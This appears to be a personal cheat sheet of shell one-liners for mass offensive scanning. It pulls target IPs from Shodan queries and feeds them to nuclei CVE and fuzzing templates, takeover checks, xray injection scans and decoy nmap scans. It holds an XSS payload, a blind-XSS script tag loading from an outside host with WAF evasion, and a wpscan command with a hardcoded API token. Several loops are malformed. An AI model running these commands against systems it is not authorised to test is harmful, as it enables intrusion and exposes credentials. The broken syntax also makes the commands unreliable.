#shodanx-mass

while read domain 
for i in {1..10}; do 

#for loop
for i in {1..10}; do shodanx custom -to 20  -ra -cq "html:\'welcome.cgi?p=logo\''  -o ip.txt; sleep 10 ;done ;


shodanx custom -to 20  -ra -cq ""  -o  .txt 

;done

#nuclei-cve

httpx  -silent -t 50|nuclei  -tags cve -es info,low   -c 50  -t   ~/Nuclei-Templates-Collection/   -o nuclei.txt   |notify -bulk

#nuclei-fuzzing

httpx  -silent -t 50|nuclei  -es info,low  -fuzz  -tags dast -c 50  -t   ~/Nuclei-Templates-Collection/   -o nuclei.txt   |notify -bulk







reverse ip lokup
...................
#filter vulnrable ip

cat nuclei.txt  |grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' |anew vuln-ip.txt

#reverse ip lokup

xargs -n1 -I{} whois -h whois.cymru.com {}

sudo apt -y install curl whois bind9-host mtr-tiny jq ipcalc grepcidr nmap ncat aha
curl "https://raw.githubusercontent.com/nitefood/asn/master/asn" -o asn ; chmod +x asn ; sudo mv asn /usr/bin




#url-nuclei-fuzz-cve
echo |while read domain ; do  waymore -mode U  -i $domain -oU  tmp-url.txt ;

cat  tmp-url.txt | grep http |grep -viE png,jpg,gif,jpeg,swf,woff,svg,pdf,json,css,js,webp,woff,woff2,eot,ttf,otf,mp4,txt | awk -F "," '{print $1}' >> url.txt ; rm  ffuf-temp.txt  ;

ffuf -mc 200,301,302,403 -t 100 -c -u "FUZZ" -w tmp-url.txt  -of csv -o url.txt ;

cat url.txt |uro|nuclei -silent -rl 05 -t  ~/Nuclei-Templates-Collection/    -es info,low  -fuzz -o nuclei-fuzzing |notify -bulk 

cat url.txt |uro|nuclei -silent -rl 05   -tags dast  -es info,low  -fuzz -o nuclei-fuzzing |notify -bulk ;
echo $domain |nuclei -silent -c 50 -t   ~/Nuclei-Templates-Collection/   -tags cve -es info,low -o nuclei-cve |notify -bulk 

; done

cat tmp-url.txt |grep -viE png,jpg,gif,jpeg,swf,woff,svg,pdf,json,css,js,webp,woff,woff2,eot,ttf,otf,mp4,txt| httpx -silent -mc 200,301,302,403 -t 100 |anew url.txt




#shodanx-domain

shodanx domain -d $domain  -to 10  -ra -o shazam-output/$domain/shodan/ips.txt

#subdoman-takeover
echo |while read domain ; do  subfinder -all -d  $domain  -silent  -o  tmp-sub.txt ;shodanx subdomain -d $domain   -to 5  -ra -o  tmp-sub.txt ;cat tmp-sub.txt | sort -u |httpx -silent -t 100 -mc 404|unfurl domain |anew 404sub.txt ;rm tmp-sub.txt ;cat 404sub.txt |httpx -silent -t 100 |nuclei -silent -c 50 -t ~/Nuclei-Templates-Collection/ -tags takeover  -es info,low -o nuclei-takeover |notify -bulk ; done

subdominator -l 404sub.txt  --validate  -o  takeovers-found.txt ; rm custom_fingerprints.json fingerprints.json ; cat takeovers-found.txt |notify -bulk 


#toekn  checking nuclei 

nuclei -tags token-spray -t ~/Nuclei-Templates-Collection/  -var token=
nuclei -tags token-spray    -var token=


#Xray 

./xray_linux_amd64 ws --url-file url.txt --plugins xss,sqldet,xxe,ssrf,cmd-injection,path-traversal --ho $(date +"%T").html 

./xray_linux_amd64 ws --url-file url.txt  --ho $(date +"%T").html 

$nmap
sudo naabu -c 50 -top-ports 1000	  -silent  -nmap-cli "nmap --min-rate 10000 -Pn -T4 -D RND:5 -sVC -v  --script vulners.nse --script-args mincvss=5.0 -oX $domain-nmap.xml"



#xss

cat  | uro| grep "=" | qsreplace '"><img src=x onerror=alert(1)>' | freq | grep -iv "Not Vulnerable"
cat |uro|grep "=" | qsreplace '"><img src=x onerror=alert(1)>' | freq | grep -iv "Not Vulnerable"

#dalfox
cat |uro|dalfox pipe  --waf-evasion  -b "<script src="https://js.rip/llpuzsq3gz"></script>"   -o dalfox.txt

#xsstick
cat  |uro| while read domain; do python3 ~/tools/XSStrike/xsstrike.py   --log-file xsstrikc.txt  -u $domain ;done


#wpscan

 wpscan  --stealthy  --force  --scope  --rua -e vt,vp,cb,dbe   --api-token NrZ3QLaKW3F4WSnL4t2bLPEaqwoxySWvtDTxEnmJSBs --ignore-main-redirect --url  https://$domain -f cli -o 


cat httpx.txt| httpx -mc 200 -silent -c 100 | anew httpx200.txt

python3 ~/tools/Corsy/corsy.py  -i  httpx200.txt  -t 20 -o /path/output.json

technolgy
nuclei -u bentley.com -tags tech ~/Nuclei-Templates-Collection/ -o  bentley.com-nuclei-tech.txt



#dirsearch

dirsearch -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json  -u $domain  --format plain -o 

